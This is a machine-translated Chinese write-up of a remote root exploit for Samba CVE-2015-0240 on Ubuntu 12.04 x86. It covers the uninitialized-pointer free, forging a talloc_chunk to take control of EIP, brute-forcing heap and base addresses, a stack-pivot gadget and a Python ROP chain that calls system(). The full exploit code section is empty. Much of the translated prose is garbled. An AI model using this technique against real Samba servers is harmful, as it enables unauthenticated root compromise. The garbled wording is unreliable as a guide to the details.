Samba CVE-2 0 1 5-0 2 4 0 remote code execution exploit practice-vulnerability warning-the black bar safety net

ID MYHACK58:62201561147
Type myhack58
Reporter 佚名
Modified 2015-04-14T00:00:00


1 demo

2 background

2 0 1 5 year 2 Month 2 3 day, the Red Hat product security team released a Samba service end of the smbd vulnerability announcement [1], the vulnerability number isCVE-2 0 1 5-0 2 4 0, almost affect all versions. The vulnerability trigger is not needed by the Samba server account authentication, and the smbd service end is usually to run with root privileges, if the vulnerability can be used to achieve arbitrary code execution, an attacker can remotely obtain system root privileges, the harm is extremely serious, and therefore the vulnerability of CVSS score also reached the 1 to 0.

The vulnerability of the basic principle is to stack on the uninitialized pointer is passed in TALLOC_FREE()function. Want to take advantage of this vulnerability, you first need to control on the stack uninitialized data, this and the compilation the generated binary file stack layout related. So few foreign security researchers for different Linux distributions the binary file to do the analysis, wherein the Worawit Wang(@sleepya_)gives better results, he confirmed on Ubuntu 12.04 x86 (Samba 3.6.3)and Debian 7 x86 (Samba 3.6.6), this vulnerability can be used to achieve remote code arbitrary execution, reference [2] in the comments. After England established the security company NCC Group of researchers shows exploit the idea of [4], but also not to use details and exploit code. Herein a detailed analysis and to achieve a Ubuntu 12.04 x86(Debian 7 x86 case is similar to the platform under the Samba service end of the remote code that any execution of exploit it.

3 vulnerability profile

There have been many articles shows vulnerability analysis [3], here only do a brief introduction. The vulnerability occurs in a function _netr_ServerPasswordSet (), local variable creds was originally desired by netr_creds_server_step_check() function to initialize, but if the structure of the input such that the netr_creds_server_step_check() fails, it can lead to creds is not initialized were introduced in the TALLOC_FREE()function:

NTSTATUS _netr_ServerPasswordSet(struct pipes_struct p, struct netr_ServerPasswordSet r) { NTSTATUS status = NT_STATUS_OK; int i; struct netlogon_creds_CredentialState *creds; [...] status = netr_creds_server_step_check(p, p->mem_ctx, r->in. computer_name, r->in. credential, r->out. return_authenticator, &creds); unbecome_root(); if (! NT_STATUS_IS_OK(status)) { [...] TALLOC_FREE(creds); return status; }

4 exploit

We first look at the smbd binary which turned on what protection mechanisms:

$ --file smbd RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH smbd

Compiler all be able to add protection mechanisms are used, the most attention is required on the PIE of protection, so if you want to use the binary itself code fragment to ROP or call the import function, you must first know the program itself to load the address.

4.1 any address Free

To exploit this vulnerability, you first need to find a control flow, to be able to control on the stack not initialized the pointer creds, so that we can achieve arbitrary address to call TALLOC_FREE () on. According to@sleepya_ the PoC, we already know, in Ubuntu 12.04 and Debian 7 x86 system, NetrServerPasswordSet request among PrimaryName the ReferentID domain happens to fall in a stack on the uninitialized pointer creds position. So we can by constructing ReferentID to achieve any address Free. PoC code is as follows:

primaryName = nrpc. PLOGONSRV_HANDLE() # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit primaryName. fields['ReferentID'] = 0x41414141

4.2 control EIP

With any address Free, we can think of a way to let the TALLOC_FREE()to release our control of the memory block, but we do not know we can control the memory address of the DCERPC request of the data stored in the heap. We can brute-force the stack address, because the smbd process using the fork the way to handle each connection, the memory space of the layout is unchanged. In addition, we may be in a heap on a large number of arrangement of the TALLOC memory blocks, to improve the hit rate, as far as possible to reduce the enumeration space. We first assume that already know the heap address, first take a look at how to structure TALLOC memory block to hijack the EIP. We need to get to know TALLOC_FREE (). First take a look at the TALLOC memory blocks of the structure:

struct talloc_chunk { struct talloc_chunk next, prev; struct talloc_chunk parent, child; struct talloc_reference_handle refs; talloc_destructor_t destructor; const char name; size_t size; unsigned flags; void *pool; 8 bytes padding; };

In order to meet the 1 6-byte aligned, this structure at the end there are 8 bytes of padding, so that the talloc_chunk structure a total of 4 to 8 bytes. In this structure, the destructor is a function pointer, we can be of any configuration. First take a look at the TALLOC_FREE()this macro expands to the code:

PUBLIC int _talloc_free(void ptr, const char location) { struct talloc_chunk *tc; if (unlikely(ptr == NULL)) { return -1; } tc = talloc_chunk_from_ptr(ptr); ... }

_talloc_free()and call the talloc_chunk_from_ptr (), this function is used to convert the memory pointer when the allocation is returned to the user using the pointer ptr into into the talloc_chunk pointer.

/ panic if we get a bad magic value / static inline struct talloc_chunk talloc_chunk_from_ptr(const void ptr) { const char pp = (const char )ptr; struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) { if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) { talloc_abort_magic(tc->flags & (~0xF)); return NULL; } if (tc->flags & TALLOC_FLAG_FREE) { talloc_log("talloc: access after free error- first free may be at %s\n", tc->name); talloc_abort_access_after_free(); return NULL; } else { talloc_abort_unknown_value(); return NULL; } } return tc; }

This function simply takes the user memory pointer is subtracted TC_HDR_SIZE and return, TC_HDR_SIZE is talloc_chunk size 4 8, but we need to meet the tc->flags check, which is set to the correct Magic Number, otherwise the function cannot return the correct pointer. Next, we continue to see _talloc_free()function:

PUBLIC int _talloc_free(void ptr, const char location) { ... tc = talloc_chunk_from_ptr(ptr); if (unlikely(tc->refs != NULL)) { struct talloc_reference_handle *h; if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) { return talloc_unlink(null_context, ptr); } talloc_log("ERROR: talloc_free with references at %s\n", location); for (h=tc->refs; h; h=h->next) { talloc_log("\treference at %s\n", h->location); } return -1; } return _talloc_free_internal(ptr, location); }

If tc->refs not equal to NULL, then enter the if branch: in order to get inside the first if branch is not linked, we need to put the tc->parent pointer is set to NULL; immediately after the for Loop and requires that we let tc->refs point to a legitimate list, there are some complex. We'll see if tc->refs for the NULL case, i.e. the program proceeds to a _talloc_free_internal()function:

static inline int _talloc_free_internal(void ptr, const char location) { ... if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) { / we have a free loop - stop looping / return 0; } if (unlikely(tc->destructor)) { talloc_destructor_t d = tc->destructor; if (d == (talloc_destructor_t)-1) { return -1; } tc->destructor = (talloc_destructor_t)-1; if (d(ptr) == -1) { // call destructor tc->destructor = d; return -1; } tc->destructor = NULL; } ... }

We omitted the function has no need to consider part in the above function, we have seen talloc_chunk the destructor to be called up, but before that there are some checks: first if, we can not be in the flags set in the TALLOC_FLAG_LOOP; in the second if, the destructor if set to -1, the function returns -1, the program will not crash if the destructor is set to another illegal address, then the program will crash and exit. We can use this feature to verify the exhaustive heap address is accurate: we are in the exhaustive when the destructor is set to-1, When you find one to TALLOC_FREE()the address does not let the program crash requests have returned, then the destructor is set to an illegal address, if the program at this time to crash, then we find that the address is correct. Now we summarize what we need to construct the chunk should satisfy the conditions:

struct talloc_chunk { struct talloc_chunk next, prev; // no request struct talloc_chunk parent, child; // no request struct talloc_reference_handle refs; // refs = 0 talloc_destructor_t destructor; // destructor = -1: (No Crash), others: is controled EIP const char name; size_t size; unsigned flags; // Condition 1: flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC // condition 2: tc->flags & TALLOC_FLAG_LOOP == False void *pool; // not required 8 bytes padding; // not required };

So far, we already know how through the structure of the chunk passed to the TALLOC_FREE()to control the EIP.

4.3 exhaustive heap address

After modifying the PoC and combined with the gdb debugging found that, we can use the new password to construct a large number of the chunk corresponding to the PoC in the uasNewPass['Data'] is. Although sent to the Samba of the request which have a lot of data stored in the heap, among such as username and password, refer to [2], but much of the data required to comply with WSTR encoding, can not be passed to any character. In order to improve the exhaustive heap address of the efficiency, we use [4] proposed the idea of using only contains the refs, a destructor, name, size, flags this the 5 domain of the compressed chunk, from 4 to 8 bytes reduced to 2 0 Byte, so in our exhaustive only when the need for each address of the exhaustive 5 offset instead of the original 1 2. Compressing the chunk of the injection and the actual talloc_chunk structure of the corresponding relationship as shown below.

! image

chunk injection quantity will also affect to the exhaustive efficiency. If the in-memory injection of the chunk more, you'll need to enumerate the space will be reduced, but each enumeration the network transport, the program of the input processing and the like factors of the resulting time overhead also increases, so the need according to the actual situation to select a compromise value. In addition, in our implementation of the exploit, the use of a process pool to achieve parallel enumeration, improved exhaustive efficiency.

4.4 ROP

To achieve the ROP, we also need to enumerate the Samba program loads the base address. Due to the address randomization protection mechanisms of the minimum granularity of memory page, so we press the pages to enumerate can 0x1000 bytes. We in the platform, a large number of test address space may range, roughly 0x200 kinds of possible scenarios can be accepted. Now we can only be configured through the destructor to control once the EIP, in order to achieve the ROP, you first need to do stack migration stack pivot we in the samba binary is found in the following gadget: a

0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ;

Since the control of the EIP site, the ecx-0x4 just point to the chunk name field, so we can see from the name field to start ROP. By setting a pop4ret pop eax ; pop esi ; pop edi ; pop ebp ; ret; the gadget, you can make esp point to the next compressed chunk in the name field, followed down, until ESP came up to us ejection of the memory at the end, where we can have unlimited write ROP Payload in.

[4] did not give a specific stack migration of the gadget, but according to the text given in the figure shown, it can be speculated that the NCC Group of researchers using the same gadget is.

4.5 arbitrary code execution

Pay attention to the smbd program to import the system function, therefore we can directly call the system of the PLT address to execute arbitrary commands. But how to a write command, if used in the stack is arranged in the command, currently we only know the compression of the chunk address, but of which only 4 bytes are available, so consider the call to snprintf, to the bss section in the byte-by-byte write command, this way you can perform arbitrary-length command. Note that, in the call to snprintf and system, byTo binary using address-independent code, PIC, and need to put the GOT table address is restored to the ebx register. Generate a ROP Payload of the Python code is as follows:

ebx => got rop = l32(popebx) + l32(got) # write cmd to bss, fmt == "%c" for i in xrange(len(cmd)):

c = cmd[i] rop += l32(snprintf) + l32(pop4ret) rop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c)) # system(cmd) rop += l32(system) + 'leet' + l32(bss)

[4] The method used is a conventional mmap() + memcpy()and then execute shellcode the way, you can achieve the same effect.

4.6 exploit the full code

5 references

  1. Samba vulnerability (CVE-2 0 1 5-0 2 4 0)
  2. PoC for Samba vulnerabilty (CVE-2 0 1 5-0 2 4 0)
  3. Samba _netr_ServerPasswordSet Expoitability Analysis
  4. Exploiting Samba CVE-2 0 1 5-0 2 4 0 on Ubuntu 12.04 and Debian 7 3 2-bit